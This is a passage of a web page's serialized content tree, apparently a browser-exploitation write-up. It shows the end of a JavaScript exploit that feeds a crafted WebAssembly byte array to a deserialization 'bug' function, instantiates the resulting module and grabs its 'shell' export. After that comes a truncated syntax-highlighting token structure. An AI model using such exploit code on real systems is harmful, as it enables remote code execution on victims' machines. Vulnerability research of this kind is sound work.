0, 0, 0, 0, 0, 0, 0,\n    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 95, 36, 3, 213, 16, 1, 128, 210, 127, 35, 3,\n    213, 231, 67, 190, 169, 253, 123, 1, 169, 253, 67, 0, 145, 191, 3, 0, 145, 253, 123, 193, 168,\n    255, 35, 3, 213, 192, 3, 95, 214, 31, 32, 3, 213, 4, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0,\n    0, 0, 0, 0, 0, 92, 50, 162, 0,\n  ]);\n  let r = bug(wasm_code, buffer.buffer);\n  result = (await r.next()).value;\n  console.log('DeserializeWasmModule result: ' + result);\n  const wasm_instance = new WebAssembly.Instance(result);\n  const f = wasm_instance.exports.shell;\n  console.log(f);\n})();\n",[136974],{"type":28,"tag":98,"props":136975,"children":136976},{"__ignoreMap":7},[136977,137000,137027,137246,137313,137320,137347,137558,137809,138060,138284,138466,138687,138765,138772,138819,138862,138898,138941,138980,139007],{"type":28,"tag":116,"props":136978,"children":136979},{"class":245,"line":246},[136980,136984,136988,136992,136996],{"type":28,"tag":116,"props":136981,"children":136982},{"style":266},[136983],{"type":33,"value":313},{"type":28,"tag":116,"props":136985,"children":136986},{"style":376},[136987],{"type":33,"value":35771},{"type":28,"tag":116,"props":136989,"children":136990},{"style":266},[136991],{"type":33,"value":39316},{"type":28,"tag":116,"props":136993,"children":136994},{"style":376},[136995],{"type":33,"value":1286},{"type":28,"tag":116,"props":136997,"children":136998},{"style":266},[136999],{"type":33,"value":1291},{"type":28,"tag":116,"props":137001,"children":137002},{"class":245,"line":256},[137003,137007,137011,137015,137019,137023],{"type":28,"tag":116,"props":137004,"children":137005},{"style":376},[137006],{"type":33,"value":35814},{"type":28,"tag":116,"props":137008,"children":137009},{"style":272},[137010],{"type":33,"value":133065},{"type":28,"tag":116,"props":137012,"children":137013},{"style":370},[137014],{"type":33,"value":2226},{"type":28,"tag":116,"props":137016,"children":137017},{"style":376},[137018],{"type":33,"value":31582},{"type":28,"tag":116,"props":137020,"children":137021},{"style":282},[137022],{"type":33,"value":133078},{"type":28,"tag":116,"props":137024,"children":137025},{"style":266},[137026],{"type":33,"value":133083},{"type":28,"tag":116,"props":137028,"children":137029},{"class":245,"line":293},[137030,137034,137038,137042,137046,137050,137054,137058,137062,137066,137070,137074,137078,137082,137086,137090,137094,137098,137102,137106,137110,137114,137118,137122,137126,137130,137134,137138,137142,137146,137150,137154,137158,137162,137166,137170,137174,137178,137182,137186,137190,137194,137198,137202,137206,137210,137214,137218,137222,137226,137230,137234,137238,137242],{"type":28,"tag":116,"props":137031,"children":137032},{"style":350},[137033],{"type":33,"value":133808},{"type":28,"tag":116,"props":137035,"children":137036},{"style":266},[137037],{"type":33,"value":825},{"type":28,"tag":116,"props":137039,"children":137040},{"style":350},[137041],{"type":33,"value":133100},{"type":28,"tag":116,"props":137043,"children":137044},{"style":266},[137045],{"type":33,"value":825},{"type":28,"tag":116,"props":137047,"children":137048},{"style":350},[137049],{"type":33,"value":133109},{"type":28,"tag":116,"props":137051,"children":137052},{"style":266},[137053],{"type":33,"value":825},{"type":28,"tag":116,"props":137055,"children":137056},{"style":350},[137057],{"type":33,"value":133118},{"type":28,"tag":116,"props":137059,"children":137060},{"style":266},[137061],{"type":33,"value":825},{"type":28,"tag":116,"props":137063,"children":137064},{"style":350},[137065],{"type":33,"value":1824},{"type":28,"tag":116,"props":137067,"children":137068},{"style":266},[137069],{"type":33,"value":825},{"type":28,"tag":116,"props":137071,"children":137072},{"style":350},[137073],{"type":33,"value":353},{"type":28,"tag":116,"props":137075,"children":137076},{"style":266},[137077],{"type":33,"value":825},{"type":28,"tag":116,"props":137079,"children":137080},{"style":350},[137081],{"type":33,"value":353},{"type":28,"tag":116,"props":137083,"children":137084},{"style":266},[137085],{"type":33,"value":825},{"type":28,"tag":116,"props":137087,"children":137088},{"style":350},[137089],{"type":33,"value":353},{"type":28,"tag":116,"props":137091,"children":137092},{"style":266},[137093],{"type":33,"value":825},{"type":28,"tag":116,"props":137095,"children":137096},{"style":350},[137097],{"type":33,"value":1824},{"type":28,"tag":116,"props":137099,"children":137100},{"style":266},[137101],{"type":33,"value":825},{"type":28,"tag":116,"props":137103,"children":137104},{"style":350},[137105],{"type":33,"value":17190},{"type":28,"tag":116,"props":137107,"children":137108},{"style":266},[137109],{"type":33,"value":825},{"type":28,"tag":116,"props":137111,"children":137112},{"style":350},[137113],{"type":33,"value":1824},{"type":28,"tag":116,"props":137115,"children":137116},{"style":266},[137117],{"type":33,"value":825},{"type":28,"tag":116,"props":137119,"children":137120},{"style":350},[137121],{"type":33,"value":133183},{"type":28,"tag":116,"props":137123,"children":137124},{"style":266},[137125],{"type":33,"value":825},{"type":28,"tag":116,"props":137127,"children":137128},{"style":350},[137129],{"type":33,"value":353},{"type":28,"tag":116,"props":137131,"children":137132},{"style":266},[137133],{"type":33,"value":825},{"type":28,"tag":116,"props":137135,"children":137136},{"style":350},[137137],{"type":33,"value":353},{"type":28,"tag":116,"props":137139,"children":137140},{"style":266},[137141],{"type":33,"value":825},{"type":28,"tag":116,"props":137143,"children":137144},{"style":350},[137145],{"type":33,"value":16957},{"type":28,"tag":116,"props":137147,"children":137148},{"style":266},[137149],{"type":33,"value":825},{"type":28,"tag":116,"props":137151,"children":137152},{"style":350},[137153],{"type":33,"value":2794},{"type":28,"tag":116,"props":137155,"children":137156},{"style":266},[137157],{"type":33,"value":825},{"type":28,"tag":116,"props":137159,"children":137160},{"style":350},[137161],{"type":33,"value":1824},{"type":28,"tag":116,"props":137163,"children":137164},{"style":266},[137165],{"type":33,"value":825},{"type":28,"tag":116,"props":137167,"children":137168},{"style":350},[137169],{"type":33,"value":353},{"type":28,"tag":116,"props":137171,"children":137172},{"style":266},[137173],{"type":33,"value":825},{"type":28,"tag":116,"props":137175,"children":137176},{"style":350},[137177],{"type":33,"value":54289},{"type":28,"tag":116,"props":137179,"children":137180},{"style":266},[137181],{"type":33,"value":825},{"type":28,"tag":116,"props":137183,"children":137184},{"style":350},[137185],{"type":33,"value":55504},{"type":28,"tag":116,"props":137187,"children":137188},{"style":266},[137189],{"type":33,"value":825},{"type":28,"tag":116,"props":137191,"children":137192},{"style":350},[137193],{"type":33,"value":1824},{"type":28,"tag":116,"props":137195,"children":137196},{"style":266},[137197],{"type":33,"value":825},{"type":28,"tag":116,"props":137199,"children":137200},{"style":350},[137201],{"type":33,"value":17771},{"type":28,"tag":116,"props":137203,"children":137204},{"style":266},[137205],{"type":33,"value":825},{"type":28,"tag":116,"props":137207,"children":137208},{"style":350},[137209],{"type":33,"value":133109},{"type":28,"tag":116,"props":137211,"children":137212},{"style":266},[137213],{"type":33,"value":825},{"type":28,"tag":116,"props":137215,"children":137216},{"style":350},[137217],{"type":33,"value":133280},{"type":28,"tag":116,"props":137219,"children":137220},{"style":266},[137221],{"type":33,"value":825},{"type":28,"tag":116,"props":137223,"children":137224},{"style":350},[137225],{"type":33,"value":133289},{"type":28,"tag":116,"props":137227,"children":137228},{"style":266},[137229],{"type":33,"value":825},{"type":28,"tag":116,"props":137231,"children":137232},{"style":350},[137233],{"type":33,"value":133298},{"type":28,"tag":116,"props":137235,"children":137236},{"style":266},[137237],{"type":33,"value":825},{"type":28,"tag":116,"props":137239,"children":137240},{"style":350},[137241],{"type":33,"value":133298},{"type":28,"tag":116,"props":137243,"children":137244},{"style":266},[137245],{"type":33,"value":3178},{"type":28,"tag":116,"props":137247,"children":137248},{"class":245,"line":361},[137249,137253,137257,137261,137265,137269,137273,137277,137281,137285,137289,137293,137297,137301,137305,137309],{"type":28,"tag":116,"props":137250,"children":137251},{"style":350},[137252],{"type":33,"value":133808},{"type":28,"tag":116,"props":137254,"children":137255},{"style":266},[137256],{"type":33,"value":825},{"type":28,"tag":116,"props":137258,"children":137259},{"style":350},[137260],{"type":33,"value":353},{"type":28,"tag":116,"props":137262,"children":137263},{"style":266},[137264],{"type":33,"value":825},{"type":28,"tag":116,"props":137266,"children":137267},{"style":350},[137268],{"type":33,"value":88871},{"type":28,"tag":116,"props":137270,"children":137271},{"style":266},[137272],{"type":33,"value":825},{"type":28,"tag":116,"props":137274,"children":137275},{"style":350},[137276],{"type":33,"value":17190},{"type":28,"tag":116,"props":137278,"children":137279},{"style":266},[137280],{"type":33,"value":825},{"type":28,"tag":116,"props":137282,"children":137283},{"style":350},[137284],{"type":33,"value":1824},{"type":28,"tag":116,"props":137286,"children":137287},{"style":266},[137288],{"type":33,"value":825},{"type":28,"tag":116,"props":137290,"children":137291},{"style":350},[137292],{"type":33,"value":2794},{"type":28,"tag":116,"props":137294,"children":137295},{"style":266},[137296],{"type":33,"value":825},{"type":28,"tag":116,"props":137298,"children":137299},{"style":350},[137300],{"type":33,"value":353},{"type":28,"tag":116,"props":137302,"children":137303},{"style":266},[137304],{"type":33,"value":825},{"type":28,"tag":116,"props":137306,"children":137307},{"style":350},[137308],{"type":33,"value":133374},{"type":28,"tag":116,"props":137310,"children":137311},{"style":266},[137312],{"type":33,"value":3178},{"type":28,"tag":116,"props":137314,"children":137315},{"class":245,"line":387},[137316],{"type":28,"tag":116,"props":137317,"children":137318},{"style":266},[137319],{"type":33,"value":134095},{"type":28,"tag":116,"props":137321,"children":137322},{"class":245,"line":400},[137323,137327,137331,137335,137339,137343],{"type":28,"tag":116,"props":137324,"children":137325},{"style":376},[137326],{"type":33,"value":35814},{"type":28,"tag":116,"props":137328,"children":137329},{"style":272},[137330],{"type":33,"value":124880},{"type":28,"tag":116,"props":137332,"children":137333},{"style":370},[137334],{"type":33,"value":2226},{"type":28,"tag":116,"props":137336,"children":137337},{"style":376},[137338],{"type":33,"value":31582},{"type":28,"tag":116,"props":137340,"children":137341},{"style":282},[137342],{"type":33,"value":133078},{"type":28,"tag":116,"props":137344,"children":137345},{"style":266},[137346],{"type":33,"value":133083},{"type":28,"tag":116,"props":137348,"children":137349},{"class":245,"line":614},[137350,137355,137359,137363,137367,137371,137375,137379,137383,137388,137392,137397,137401,137406,137410,137415,137419,137423,137427,137431,137435,137439,137443,137447,137451,137456,137460,137465,137469,137474,137478,137482,137486,137490,137494,137498,137502,137506,137510,137514,137518,137522,137526,137530,137534,137538,137542,137546,137550,137554],{"type":28,"tag":116,"props":137351,"children":137352},{"style":350},[137353],{"type":33,"value":137354},"    146",{"type":28,"tag":116,"props":137356,"children":137357},{"style":266},[137358],{"type":33,"value":825},{"type":28,"tag":116,"props":137360,"children":137361},{"style":350},[137362],{"type":33,"value":18083},{"type":28,"tag":116,"props":137364,"children":137365},{"style":266},[137366],{"type":33,"value":825},{"type":28,"tag":116,"props":137368,"children":137369},{"style":350},[137370],{"type":33,"value":134147},{"type":28,"tag":116,"props":137372,"children":137373},{"style":266},[137374],{"type":33,"value":825},{"type":28,"tag":116,"props":137376,"children":137377},{"style":350},[137378],{"type":33,"value":134156},{"type":28,"tag":116,"props":137380,"children":137381},{"style":266},[137382],{"type":33,"value":825},{"type":28,"tag":116,"props":137384,"children":137385},{"style":350},[137386],{"type":33,"value":137387},"174",{"type":28,"tag":116,"props":137389,"children":137390},{"style":266},[137391],{"type":33,"value":825},{"type":28,"tag":116,"props":137393,"children":137394},{"style":350},[137395],{"type":33,"value":137396},"122",{"type":28,"tag":116,"props":137398,"children":137399},{"style":266},[137400],{"type":33,"value":825},{"type":28,"tag":116,"props":137402,"children":137403},{"style":350},[137404],{"type":33,"value":137405},"171",{"type":28,"tag":116,"props":137407,"children":137408},{"style":266},[137409],{"type":33,"value":825},{"type":28,"tag":116,"props":137411,"children":137412},{"style":350},[137413],{"type":33,"value":137414},"151",{"type":28,"tag":116,"props":137416,"children":137417},{"style":266},[137418],{"type":33,"value":825},{"type":28,"tag":116,"props":137420,"children":137421},{"style":350},[137422],{"type":33,"value":96283},{"type":28,"tag":116,"props":137424,"children":137425},{"style":266},[137426],{"type":33,"value":825},{"type":28,"tag":116,"props":137428,"children":137429},{"style":350},[137430],{"type":33,"value":353},{"type":28,"tag":116,"props":137432,"children":137433},{"style":266},[137434],{"type":33,"value":825},{"type":28,"tag":116,"props":137436,"children":137437},{"style":350},[137438],{"type":33,"value":353},{"type":28,"tag":116,"props":137440,"children":137441},{"style":266},[137442],{"type":33,"value":825},{"type":28,"tag":116,"props":137444,"children":137445},{"style":350},[137446],{"type":33,"value":353},{"type":28,"tag":116,"props":137448,"children":137449},{"style":266},[137450],{"type":33,"value":825},{"type":28,"tag":116,"props":137452,"children":137453},{"style":350},[137454],{"type":33,"value":137455},"39",{"type":28,"tag":116,"props":137457,"children":137458},{"style":266},[137459],{"type":33,"value":825},{"type":28,"tag":116,"props":137461,"children":137462},{"style":350},[137463],{"type":33,"value":137464},"61",{"type":28,"tag":116,"props":137466,"children":137467},{"style":266},[137468],{"type":33,"value":825},{"type":28,"tag":116,"props":137470,"children":137471},{"style":350},[137472],{"type":33,"value":137473},"60",{"type":28,"tag":116,"props":137475,"children":137476},{"style":266},[137477],{"type":33,"value":825},{"type":28,"tag":116,"props":137479,"children":137480},{"style":350},[137481],{"type":33,"value":96283},{"type":28,"tag":116,"props":137483,"children":137484},{"style":266},[137485],{"type":33,"value":825},{"type":28,"tag":116,"props":137487,"children":137488},{"style":350},[137489],{"type":33,"value":353},{"type":28,"tag":116,"props":137491,"children":137492},{"style":266},[137493],{"type":33,"value":825},{"type":28,"tag":116,"props":137495,"children":137496},{"style":350},[137497],{"type":33,"value":40467},{"type":28,"tag":116,"props":137499,"children":137500},{"style":266},[137501],{"type":33,"value":825},{"type":28,"tag":116,"props":137503,"children":137504},{"style":350},[137505],{"type":33,"value":16957},{"type":28,"tag":116,"props":137507,"children":137508},{"style":266},[137509],{"type":33,"value":825},{"type":28,"tag":116,"props":137511,"children":137512},{"style":350},[137513],{"type":33,"value":353},{"type":28,"tag":116,"props":137515,"children":137516},{"style":266},[137517],{"type":33,"value":825},{"type":28,"tag":116,"props":137519,"children":137520},{"style":350},[137521],{"type":33,"value":353},{"type":28,"tag":116,"props":137523,"children":137524},{"style":266},[137525],{"type":33,"value":825},{"type":28,"tag":116,"props":137527,"children":137528},{"style":350},[137529],{"type":33,"value":353},{"type":28,"tag":116,"props":137531,"children":137532},{"style":266},[137533],{"type":33,"value":825},{"type":28,"tag":116,"props":137535,"children":137536},{"style":350},[137537],{"type":33,"value":353},{"type":28,"tag":116,"props":137539,"children":137540},{"style":266},[137541],{"type":33,"value":825},{"type":28,"tag":116,"props":137543,"children":137544},{"style":350},[137545],{"type":33,"value":353},{"type":28,"tag":116,"props":137547,"children":137548},{"style":266},[137549],{"type":33,"value":825},{"type":28,"tag":116,"props":137551,"children":137552},{"style":350},[137553],{"type":33,"value":29078},{"type":28,"tag":116,"props":137555,"children":137556},{"style":266},[137557],{"type":33,"value":3178},{"type":28,"tag":116,"props":137559,"children":137560},{"class":245,"line":631},[137561,137565,137569,137573,137577,137581,137585,137589,137593,137597,137601,137605,137609,137613,137617,137621,137625,137629,137633,137637,137641,137645,137649,137653,137657,137661,137665,137669,137673,137677,137681,137685,137689,137693,137697,137701,137705,137709,137713,137717,137721,137725,137729,137733,137737,137741,137745,137749,137753,137757,137761,137765,137769,137773,137777,137781,137785,137789,137793,137797,137801,137805],{"type":28,"tag":116,"props":137562,"children":137563},{"style":350},[137564],{"type":33,"value":133808},{"type":28,"tag":116,"props":137566,"children":137567},{"style":266},[137568],{"type":33,"value":825},{"type":28,"tag":116,"props":137570,"children":137571},{"style":350},[137572],{"type":33,"value":353},{"type":28,"tag":116,"props":137574,"children":137575},{"style":266},[137576],{"type":33,"value":825},{"type":28,"tag":116,"props":137578,"children":137579},{"style":350},[137580],{"type":33,"value":353},{"type":28,"tag":116,"props":137582,"children":137583},{"style":266},[137584],{"type":33,"value":825},{"type":28,"tag":116,"props":137586,"children":137587},{"style":350},[137588],{"type":33,"value":353},{"type":28,"tag":116,"props":137590,"children":137591},{"style":266},[137592],{"type":33,"value":825},{"type":28,"tag":116,"props":137594,"children":137595},{"style":350},[137596],{"type":33,"value":353},{"type":28,"tag":116,"props":137598,"children":137599},{"style":266},[137600],{"type":33,"value":825},{"type":28,"tag":116,"props":137602,"children":137603},{"style":350},[137604],{"type":33,"value":353},{"type":28,"tag":116,"props":137606,"children":137607},{"style":266},[137608],{"type":33,"value":825},{"type":28,"tag":116,"props":137610,"children":137611},{"style":350},[137612],{"type":33,"value":353},{"type":28,"tag":116,"props":137614,"children":137615},{"style":266},[137616],{"type":33,"value":825},{"type":28,"tag":116,"props":137618,"children":137619},{"style":350},[137620],{"type":33,"value":1824},{"type":28,"tag":116,"props":137622,"children":137623},{"style":266},[137624],{"type":33,"value":825},{"type":28,"tag":116,"props":137626,"children":137627},{"style":350},[137628],{"type":33,"value":353},{"type":28,"tag":116,"props":137630,"children":137631},{"style":266},[137632],{"type":33,"value":825},{"type":28,"tag":116,"props":137634,"children":137635},{"style":350},[137636],{"type":33,"value":353},{"type":28,"tag":116,"props":137638,"children":137639},{"style":266},[137640],{"type":33,"value":825},{"type":28,"tag":116,"props":137642,"children":137643},{"style":350},[137644],{"type":33,"value":353},{"type":28,"tag":116,"props":137646,"children":137647},{"style":266},[137648],{"type":33,"value":825},{"type":28,"tag":116,"props":137650,"children":137651},{"style":350},[137652],{"type":33,"value":353},{"type":28,"tag":116,"props":137654,"children":137655},{"style":266},[137656],{"type":33,"value":825},{"type":28,"tag":116,"props":137658,"children":137659},{"style":350},[137660],{"type":33,"value":353},{"type":28,"tag":116,"props":137662,"children":137663},{"style":266},[137664],{"type":33,"value":825},{"type":28,"tag":116,"props":137666,"children":137667},{"style":350},[137668],{"type":33,"value":353},{"type":28,"tag":116,"props":137670,"children":137671},{"style":266},[137672],{"type":33,"value":825},{"type":28,"tag":116,"props":137674,"children":137675},{"style":350},[137676],{"type":33,"value":353},{"type":28,"tag":116,"props":137678,"children":137679},{"style":266},[137680],{"type":33,"value":825},{"type":28,"tag":116,"props":137682,"children":137683},{"style":350},[137684],{"type":33,"value":353},{"type":28,"tag":116,"props":137686,"children":137687},{"style":266},[137688],{"type":33,"value":825},{"type":28,"tag":116,"props":137690,"children":137691},{"style":350},[137692],{"type":33,"value":17190},{"type":28,"tag":116,"props":137694,"children":137695},{"style":266},[137696],{"type":33,"value":825},{"type":28,"tag":116,"props":137698,"children":137699},{"style":350},[137700],{"type":33,"value":44750},{"type":28,"tag":116,"props":137702,"children":137703},{"style":266},[137704],{"type":33,"value":825},{"type":28,"tag":116,"props":137706,"children":137707},{"style":350},[137708],{"type":33,"value":353},{"type":28,"tag":116,"props":137710,"children":137711},{"style":266},[137712],{"type":33,"value":825},{"type":28,"tag":116,"props":137714,"children":137715},{"style":350},[137716],{"type":33,"value":353},{"type":28,"tag":116,"props":137718,"children":137719},{"style":266},[137720],{"type":33,"value":825},{"type":28,"tag":116,"props":137722,"children":137723},{"style":350},[137724],{"type":33,"value":353},{"type":28,"tag":116,"props":137726,"children":137727},{"style":266},[137728],{"type":33,"value":825},{"type":28,"tag":116,"props":137730,"children":137731},{"style":350},[137732],{"type":33,"value":134183},{"type":28,"tag":116,"props":137734,"children":137735},{"style":266},[137736],{"type":33,"value":825},{"type":28,"tag":116,"props":137738,"children":137739},{"style":350},[137740],{"type":33,"value":353},{"type":28,"tag":116,"props":137742,"children":137743},{"style":266},[137744],{"type":33,"value":825},{"type":28,"tag":116,"props":137746,"children":137747},{"style":350},[137748],{"type":33,"value":353},{"type":28,"tag":116,"props":137750,"children":137751},{"style":266},[137752],{"type":33,"value":825},{"type":28,"tag":116,"props":137754,"children":137755},{"style":350},[137756],{"type":33,"value":353},{"type":28,"tag":116,"props":137758,"children":137759},{"style":266},[137760],{"type":33,"value":825},{"type":28,"tag":116,"props":137762,"children":137763},{"style":350},[137764],{"type":33,"value":44750},{"type":28,"tag":116,"props":137766,"children":137767},{"style":266},[137768],{"type":33,"value":825},{"type":28,"tag":116,"props":137770,"children":137771},{"style":350},[137772],{"type":33,"value":353},{"type":28,"tag":116,"props":137774,"children":137775},{"style":266},[137776],{"type":33,"value":825},{"type":28,"tag":116,"props":137778,"children":137779},{"style":350},[137780],{"type":33,"value":353},{"type":28,"tag":116,"props":137782,"children":137783},{"style":266},[137784],{"type":33,"value":825},{"type":28,"tag":116,"props":137786,"children":137787},{"style":350},[137788],{"type":33,"value":353},{"type":28,"tag":116,"props":137790,"children":137791},{"style":266},[137792],{"type":33,"value":825},{"type":28,"tag":116,"props":137794,"children":137795},{"style":350},[137796],{"type":33,"value":44750},{"type":28,"tag":116,"props":137798,"children":137799},{"style":266},[137800],{"type":33,"value":825},{"type":28,"tag":116,"props":137802,"children":137803},{"style":350},[137804],{"type":33,"value":353},{"type":28,"tag":116,"props":137806,"children":137807},{"style":266},[137808],{"type":33,"value":3178},{"type":28,"tag":116,"props":137810,"children":137811},{"class":245,"line":665},[137812,137816,137820,137824,137828,137832,137836,137840,137844,137848,137852,137856,137860,137864,137868,137872,137876,137880,137884,137888,137892,137896,137900,137904,137908,137912,137916,137920,137924,137928,137932,137936,137940,137944,137948,137952,137956,137960,137964,137968,137972,137976,137980,137984,137988,137992,137996,138000,138004,138008,138012,138016,138020,138024,138028,138032,138036,138040,138044,138048,138052,138056],{"type":28,"tag":116,"props":137813,"children":137814},{"style":350},[137815],{"type":33,"value":133808},{"type":28,"tag":116,"props":137817,"children":137818},{"style":266},[137819],{"type":33,"value":825},{"type":28,"tag":116,"props":137821,"children":137822},{"style":350},[137823],{"type":33,"value":353},{"type":28,"tag":116,"props":137825,"children":137826},{"style":266},[137827],{"type":33,"value":825},{"type":28,"tag":116,"props":137829,"children":137830},{"style":350},[137831],{"type":33,"value":44750},{"type":28,"tag":116,"props":137833,"children":137834},{"style":266},[137835],{"type":33,"value":825},{"type":28,"tag":116,"props":137837,"children":137838},{"style":350},[137839],{"type":33,"value":353},{"type":28,"tag":116,"props":137841,"children":137842},{"style":266},[137843],{"type":33,"value":825},{"type":28,"tag":116,"props":137845,"children":137846},{"style":350},[137847],{"type":33,"value":353},{"type":28,"tag":116,"props":137849,"children":137850},{"style":266},[137851],{"type":33,"value":825},{"type":28,"tag":116,"props":137853,"children":137854},{"style":350},[137855],{"type":33,"value":353},{"type":28,"tag":116,"props":137857,"children":137858},{"style":266},[137859],{"type":33,"value":825},{"type":28,"tag":116,"props":137861,"children":137862},{"style":350},[137863],{"type":33,"value":17190},{"type":28,"tag":116,"props":137865,"children":137866},{"style":266},[137867],{"type":33,"value":825},{"type":28,"tag":116,"props":137869,"children":137870},{"style":350},[137871],{"type":33,"value":353},{"type":28,"tag":116,"props":137873,"children":137874},{"style":266},[137875],{"type":33,"value":825},{"type":28,"tag":116,"props":137877,"children":137878},{"style":350},[137879],{"type":33,"value":353},{"type":28,"tag":116,"props":137881,"children":137882},{"style":266},[137883],{"type":33,"value":825},{"type":28,"tag":116,"props":137885,"children":137886},{"style":350},[137887],{"type":33,"value":353},{"type":28,"tag":116,"props":137889,"children":137890},{"style":266},[137891],{"type":33,"value":825},{"type":28,"tag":116,"props":137893,"children":137894},{"style":350},[137895],{"type":33,"value":353},{"type":28,"tag":116,"props":137897,"children":137898},{"style":266},[137899],{"type":33,"value":825},{"type":28,"tag":116,"props":137901,"children":137902},{"style":350},[137903],{"type":33,"value":353},{"type":28,"tag":116,"props":137905,"children":137906},{"style":266},[137907],{"type":33,"value":825},{"type":28,"tag":116,"props":137909,"children":137910},{"style":350},[137911],{"type":33,"value":353},{"type":28,"tag":116,"props":137913,"children":137914},{"style":266},[137915],{"type":33,"value":825},{"type":28,"tag":116,"props":137917,"children":137918},{"style":350},[137919],{"type":33,"value":353},{"type":28,"tag":116,"props":137921,"children":137922},{"style":266},[137923],{"type":33,"value":825},{"type":28,"tag":116,"props":137925,"children":137926},{"style":350},[137927],{"type":33,"value":353},{"type":28,"tag":116,"props":137929,"children":137930},{"style":266},[137931],{"type":33,"value":825},{"type":28,"tag":116,"props":137933,"children":137934},{"style":350},[137935],{"type":33,"value":353},{"type":28,"tag":116,"props":137937,"children":137938},{"style":266},[137939],{"type":33,"value":825},{"type":28,"tag":116,"props":137941,"children":137942},{"style":350},[137943],{"type":33,"value":353},{"type":28,"tag":116,"props":137945,"children":137946},{"style":266},[137947],{"type":33,"value":825},{"type":28,"tag":116,"props":137949,"children":137950},{"style":350},[137951],{"type":33,"value":353},{"type":28,"tag":116,"props":137953,"children":137954},{"style":266},[137955],{"type":33,"value":825},{"type":28,"tag":116,"props":137957,"children":137958},{"style":350},[137959],{"type":33,"value":29078},{"type":28,"tag":116,"props":137961,"children":137962},{"style":266},[137963],{"type":33,"value":825},{"type":28,"tag":116,"props":137965,"children":137966},{"style":350},[137967],{"type":33,"value":353},{"type":28,"tag":116,"props":137969,"children":137970},{"style":266},[137971],{"type":33,"value":825},{"type":28,"tag":116,"props":137973,"children":137974},{"style":350},[137975],{"type":33,"value":353},{"type":28,"tag":116,"props":137977,"children":137978},{"style":266},[137979],{"type":33,"value":825},{"type":28,"tag":116,"props":137981,"children":137982},{"style":350},[137983],{"type":33,"value":353},{"type":28,"tag":116,"props":137985,"children":137986},{"style":266},[137987],{"type":33,"value":825},{"type":28,"tag":116,"props":137989,"children":137990},{"style":350},[137991],{"type":33,"value":353},{"type":28,"tag":116,"props":137993,"children":137994},{"style":266},[137995],{"type":33,"value":825},{"type":28,"tag":116,"props":137997,"children":137998},{"style":350},[137999],{"type":33,"value":353},{"type":28,"tag":116,"props":138001,"children":138002},{"style":266},[138003],{"type":33,"value":825},{"type":28,"tag":116,"props":138005,"children":138006},{"style":350},[138007],{"type":33,"value":353},{"type":28,"tag":116,"props":138009,"children":138010},{"style":266},[138011],{"type":33,"value":825},{"type":28,"tag":116,"props":138013,"children":138014},{"style":350},[138015],{"type":33,"value":353},{"type":28,"tag":116,"props":138017,"children":138018},{"style":266},[138019],{"type":33,"value":825},{"type":28,"tag":116,"props":138021,"children":138022},{"style":350},[138023],{"type":33,"value":353},{"type":28,"tag":116,"props":138025,"children":138026},{"style":266},[138027],{"type":33,"value":825},{"type":28,"tag":116,"props":138029,"children":138030},{"style":350},[138031],{"type":33,"value":353},{"type":28,"tag":116,"props":138033,"children":138034},{"style":266},[138035],{"type":33,"value":825},{"type":28,"tag":116,"props":138037,"children":138038},{"style":350},[138039],{"type":33,"value":353},{"type":28,"tag":116,"props":138041,"children":138042},{"style":266},[138043],{"type":33,"value":825},{"type":28,"tag":116,"props":138045,"children":138046},{"style":350},[138047],{"type":33,"value":353},{"type":28,"tag":116,"props":138049,"children":138050},{"style":266},[138051],{"type":33,"value":825},{"type":28,"tag":116,"props":138053,"children":138054},{"style":350},[138055],{"type":33,"value":353},{"type":28,"tag":116,"props":138057,"children":138058},{"style":266},[138059],{"type":33,"value":3178},{"type":28,"tag":116,"props":138061,"children":138062},{"class":245,"line":713},[138063,138067,138071,138075,138079,138083,138087,138091,138095,138099,138103,138107,138111,138115,138119,138123,138127,138131,138135,138139,138143,138147,138151,138155,138159,138163,138167,138171,138175,138179,138183,138187,138191,138196,138200,138205,138209,138213,138217,138222,138226,138230,138234,138238,138242,138246,138250,138255,138259,138263,138267,138272,138276,138280],{"type":28,"tag":116,"props":138064,"children":138065},{"style":350},[138066],{"type":33,"value":133808},{"type":28,"tag":116,"props":138068,"children":138069},{"style":266},[138070],{"type":33,"value":825},{"type":28,"tag":116,"props":138072,"children":138073},{"style":350},[138074],{"type":33,"value":353},{"type":28,"tag":116,"props":138076,"children":138077},{"style":266},[138078],{"type":33,"value":825},{"type":28,"tag":116,"props":138080,"children":138081},{"style":350},[138082],{"type":33,"value":353},{"type":28,"tag":116,"props":138084,"children":138085},{"style":266},[138086],{"type":33,"value":825},{"type":28,"tag":116,"props":138088,"children":138089},{"style":350},[138090],{"type":33,"value":353},{"type":28,"tag":116,"props":138092,"children":138093},{"style":266},[138094],{"type":33,"value":825},{"type":28,"tag":116,"props":138096,"children":138097},{"style":350},[138098],{"type":33,"value":353},{"type":28,"tag":116,"props":138100,"children":138101},{"style":266},[138102],{"type":33,"value":825},{"type":28,"tag":116,"props":138104,"children":138105},{"style":350},[138106],{"type":33,"value":353},{"type":28,"tag":116,"props":138108,"children":138109},{"style":266},[138110],{"type":33,"value":825},{"type":28,"tag":116,"props":138112,"children":138113},{"style":350},[138114],{"type":33,"value":353},{"type":28,"tag":116,"props":138116,"children":138117},{"style":266},[138118],{"type":33,"value":825},{"type":28,"tag":116,"props":138120,"children":138121},{"style":350},[138122],{"type":33,"value":353},{"type":28,"tag":116,"props":138124,"children":138125},{"style":266},[138126],{"type":33,"value":825},{"type":28,"tag":116,"props":138128,"children":138129},{"style":350},[138130],{"type":33,"value":353},{"type":28,"tag":116,"props":138132,"children":138133},{"style":266},[138134],{"type":33,"value":825},{"type":28,"tag":116,"props":138136,"children":138137},{"style":350},[138138],{"type":33,"value":353},{"type":28,"tag":116,"props":138140,"children":138141},{"style":266},[138142],{"type":33,"value":825},{"type":28,"tag":116,"props":138144,"children":138145},{"style":350},[138146],{"type":33,"value":353},{"type":28,"tag":116,"props":138148,"children":138149},{"style":266},[138150],{"type":33,"value":825},{"type":28,"tag":116,"props":138152,"children":138153},{"style":350},[138154],{"type":33,"value":353},{"type":28,"tag":116,"props":138156,"children":138157},{"style":266},[138158],{"type":33,"value":825},{"type":28,"tag":116,"props":138160,"children":138161},{"style":350},[138162],{"type":33,"value":353},{"type":28,"tag":116,"props":138164,"children":138165},{"style":266},[138166],{"type":33,"value":825},{"type":28,"tag":116,"props":138168,"children":138169},{"style":350},[138170],{"type":33,"value":353},{"type":28,"tag":116,"props":138172,"children":138173},{"style":266},[138174],{"type":33,"value":825},{"type":28,"tag":116,"props":138176,"children":138177},{"style":35